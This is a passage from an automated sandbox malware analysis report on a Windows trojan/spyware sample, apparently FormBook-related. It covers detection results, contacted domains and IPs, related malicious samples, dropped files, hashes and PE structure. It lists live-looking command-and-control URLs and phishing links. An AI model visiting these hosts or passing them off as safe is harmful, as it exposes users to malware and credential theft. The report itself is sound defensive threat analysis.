                                                                                                            		tracy.clubUnited States
                                                                                                            		8987AMAZONEXPANSIONGBfalse
                                                                                                            172.81.61.224
                                                                                                            		www.moritynomxd.xyzUnited States
                                                                                                            		22552ESITEDUStrue
                                                                                                            94.73.146.114
                                                                                                            		sppsuperplast.onlineTurkey
                                                                                                            		34619CIZGITRfalse
                                                                                                            15.197.172.60
                                                                                                            		www.syncnodex.netUnited States
                                                                                                            		7430TANDEMUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1528155
                                                                                                            Start date and time:2024-10-07 15:53:42 +02:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 8m 43s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Run name:Run with higher sleep bypass
                                                                                                            Number of analysed new started processes analysed:11
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:YSjOEAta07.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@11/9
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 75%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 96%
                                                                                                            • Number of executed functions: 35
                                                                                                            • Number of non-executed functions: 318
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target GmuPchEfAM.exe, PID 1672 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            • VT rate limit hit for: YSjOEAta07.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            09:55:23API Interceptor6880563x Sleep call for process: replace.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            209.74.95.29PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.pofgof.pro/gfz9/
                                                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.pofgof.pro/gfz9/
                                                                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.pofgof.pro/gfz9/
                                                                                                            List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • www.onetoph.xyz/h5ax/
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.sterkus.xyz/ha8h/
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.pofgof.pro/gfz9/
                                                                                                            46.17.172.49Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.galaxyslot88rtp.lat/zkan/?EZ2lo=6ZAT3xIn5pUb7db/tro8oHOZJyMtHS049C+OqD69Fiv/T4rqyATbhBxWGTJ8nzJFC6ZuCLeYMeRBfErXdr+6Npf/MiZpvdt0v4GFRoEaqN4q8s+9XQ==&7NP=7FXXUPl
                                                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.galaxyslot88rtp.lat/sfat/
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.galaxyslot88rtp.lat/lbpf/
                                                                                                            84.32.84.32Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.b-ambu.com/a2tr/
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.agilizeimob.app/we8s/
                                                                                                            Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • www.casesrep.site/7z6q/
                                                                                                            -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dfmagazine.shop/7k8f/
                                                                                                            DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.agilizeimob.app/bnrj/
                                                                                                            Order.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.servehimfoundation.org/wlo5/
                                                                                                            Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.thepeatear.online/lu5k/
                                                                                                            Order 001-1.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.servehimfoundation.org/wlo5/
                                                                                                            Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.dfmagazine.shop/wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT
                                                                                                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.agilizeimob.app/zkp2/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0017.t-0009.t-msedge.netPayment.vbsGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.45
                                                                                                            original.emlGet hashmaliciousTycoon2FABrowse
                                                                                                            • 13.107.246.45
                                                                                                            5fe2eenspI.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            http://46.27.141.62Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://kohlhage-de.powerappsportals.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                            • 13.107.246.45
                                                                                                            SecuriteInfo.com.Win32.PWSX-gen.19312.293.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            September payments.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://pub-e8583bd7c3574b5b8171769cd95518de.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.246.45
                                                                                                            Fact-2024-10.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.246.45

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            NTT-LT-ASLTPending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            SOA SEPT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 84.32.84.32
                                                                                                            http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                            • 84.32.84.33
                                                                                                            GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                            • 84.32.44.139
                                                                                                            -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 84.32.84.32
                                                                                                            BDncqpUxZl.dllGet hashmaliciousBumbleBeeBrowse
                                                                                                            • 84.32.84.32
                                                                                                            AS-HOSTINGERLTArrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 212.1.210.65
                                                                                                            https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 212.1.210.65
                                                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            http://email.technologycurrent.co/c/eJxszruutCoAxfGn0ZJwRwqLk0z2a-xwVcQBLyiMT38yu_7a__oVy45MOig4692IBBaIMYpFP48ODYNEDhPqjbFSUey0hpQJq9g39GHEEFMoMYUMEyqA-5MDR9YOimjaUVicmVNe8_Qx13G4VIDJ_TrOpWwd-a_DPx3-KYcyEfxLfnfy08rakReFYX-awMuMypWgRfapXu8T1PmuftcLv-dtd5VbhPiVeQs-yHuQDC9GfvSHn1JMktV7Njxd2kXYbrgt4QnvayKuCHMINKmdf05bzXORKcbdTfCsJkQRs7ggoS2fKYeDyeRpDj7qwHTektYEyhg1zFUKZvWnyCP4p7nFipqkTwshdD6Xmdvn_eSMq0ttOLem5HQZb9d9XYlgDuuIMtS6rbtQHeYuzB153dsauUe0yORK2xe8yJrTCWMM60TvWj3G79Jh_vt7lvfWkdcZVUvpr-S0lo685v4Y1eoPZzM4N3eo9KiOwuo2BdzVl7GBM6qQIcD7swMIEEEFBQ8Weui0AVnFu4LvQwWQMHt_j_j_AAAA__8ljcBoGet hashmaliciousUnknownBrowse
                                                                                                            • 31.170.167.140
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 46.17.172.49
                                                                                                            https://ap.lc/ZEpPnGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 45.84.207.112
                                                                                                            https://pub-030caf7977104c7399cc2aba5fb31b23.r2.dev/tcg33.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 45.84.207.112
                                                                                                            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 31.220.106.87
                                                                                                            firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 153.92.11.109
                                                                                                            INTERNET-CZKtis238403KtisCZRFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                                                                                            • 81.2.235.111
                                                                                                            ExeFile (171).exeGet hashmaliciousEmotetBrowse
                                                                                                            • 81.2.235.111
                                                                                                            VvlYJBzLuW.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 194.182.83.4
                                                                                                            UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                            • 81.2.194.105
                                                                                                            MULTIBAND-NEWHOPEUSrInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            NEW INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29
                                                                                                            https://nassistenza-online.209-74-64-227.cprapid.com/Get hashmaliciousPhisherBrowse
                                                                                                            • 209.74.64.227
                                                                                                            rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 209.74.64.189
                                                                                                            SEY4MER_SWIFT0002_3U782_AKI3892_475_3Y54_N023_3U987_08HNF_ADM48.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 209.74.95.146
                                                                                                            SEY4MER_SWIFT0002_3U782_AKI3892_475_3Y54_N023_3U987_08HNF_ADM48.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 209.74.95.146
                                                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29
                                                                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Temp\6U0173jM

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\replace.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                            Category:dropped
                                                                                                            Size (bytes):196608
                                                                                                            Entropy (8bit):1.1221538113908904
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Maianthemum

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\YSjOEAta07.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):287232
                                                                                                            Entropy (8bit):7.994512677072538
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:6144:SvAhJSAs1Tc4xXLLyPadwLsQH6wIFB73l6QkNQto:8aJSJKYyCdwLfH6wIFBl6N+q
                                                                                                            MD5:4A0AA9913F618FF11D3CE4AB70A79731
                                                                                                            SHA1:AFE629C4A49A17BCCC4FC896865ECFDDE8D1B20E
                                                                                                            SHA-256:577900974A0BD42F40C89E16D8A4FBD98BA0BE228AFA15BCF369884953195902
                                                                                                            SHA-512:62D55B65B3D3651B4F6A8CF5A314E6CBD2B604E100409975FE98740BC0348197BAF1CC0A75322EEEE771DDC910F861620BBBE51E685DAE9F9D36A3F7B6F17370
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:x....ZVVO..X...s.L4..j6K...ZVVOJTUQE4VXO8L77KPB5CUULZVVOJ.UQE:I.A8.>.j.Cy.t.$3%v?8;2#$Yv;.V"XCk2'.1 ;l38v...u<*P3vB5F.7KPB5CU,MS.k/-.h1".k8(.V...j"R.O..j6(.N....6?.j%T_v0%.CUULZVVO..UQ.5WX..n7KPB5CUU.ZTWDK_UQ.0VXO8L77KP. CUU\ZVV/NTUQ.4VHO8L57KVB5CUULZPVOJTUQE46\O8N77KPB5AU..ZVFOJDUQE4FXO(L77KPB%CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVx;/,!QE4..K8L'7KP.1CUELZVVOJTUQE4VXO.L7WKPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB5CUULZVVOJTUQE4VXO8L77KPB

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.541545770077006
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:YSjOEAta07.exe
                                                                                                            File size:1'361'945 bytes
                                                                                                            MD5:eb0f7c655c78976889355aa35a43dd38
                                                                                                            SHA1:42238019d0febe523faa8b9d851292090ac9a409
                                                                                                            SHA256:a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e
                                                                                                            SHA512:f56f4857af14bb282a64b15c25bb545fa7ef2c4cfed23d98475a3bdafb4eb36d866404dcfed8e23532ae2acf7907dad6e5e0b74f1a87a2a1313c14f97289a7a0
                                                                                                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCPKLNrPbDyvCQJ+A5w1DdBXuZMRHUmA:7JZoQrbTFZY1iaCPKJr6/+A5wxdBXuZt
                                                                                                            TLSH:A555F222B5D69076C2B327B19E7EF76A963D79360327D1DB23C42D325EA00416B29733
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                            File Icon

                                                                                                            Icon Hash:1733312925935517

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4165c1
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            call 00007F1804E9CE9Bh
                                                                                                            jmp 00007F1804E93D0Eh
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                            mov eax, ecx
                                                                                                            mov edx, ecx
                                                                                                            add eax, esi
                                                                                                            cmp edi, esi
                                                                                                            jbe 00007F1804E93E8Ah
                                                                                                            cmp edi, eax
                                                                                                            jc 00007F1804E94026h
                                                                                                            cmp ecx, 00000080h
                                                                                                            jc 00007F1804E93E9Eh
                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                            je 00007F1804E93E95h
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            and edi, 0Fh
                                                                                                            and esi, 0Fh
                                                                                                            cmp edi, esi
                                                                                                            pop esi
                                                                                                            pop edi
                                                                                                            jne 00007F1804E93E87h
                                                                                                            jmp 00007F1804E94262h
                                                                                                            test edi, 00000003h
                                                                                                            jne 00007F1804E93E96h
                                                                                                            shr ecx, 02h
                                                                                                            and edx, 03h
                                                                                                            cmp ecx, 08h
                                                                                                            jc 00007F1804E93EABh
                                                                                                            rep movsd
                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                            mov eax, edi
                                                                                                            mov edx, 00000003h
                                                                                                            sub ecx, 04h
                                                                                                            jc 00007F1804E93E8Eh
                                                                                                            and eax, 03h
                                                                                                            add ecx, eax
                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                            nop
                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                            nop
                                                                                                            inc cx
                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                            inc cx
                                                                                                            add byte ptr [ebx], ah
                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                            inc esi
                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                            add al, cl
                                                                                                            jmp 00007F180730C687h
                                                                                                            add esi, 03h
                                                                                                            add edi, 03h
                                                                                                            cmp ecx, 08h
                                                                                                            jc 00007F1804E93E4Eh
                                                                                                            rep movsd
                                                                                                            jmp dword ptr [00000000h+edx*4]

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                            • [LNK] VS2010 SP1 build 40219

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                            RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                            RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                            RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                            RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                            RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                            RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                            RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                            RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                            RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                            RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                            RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
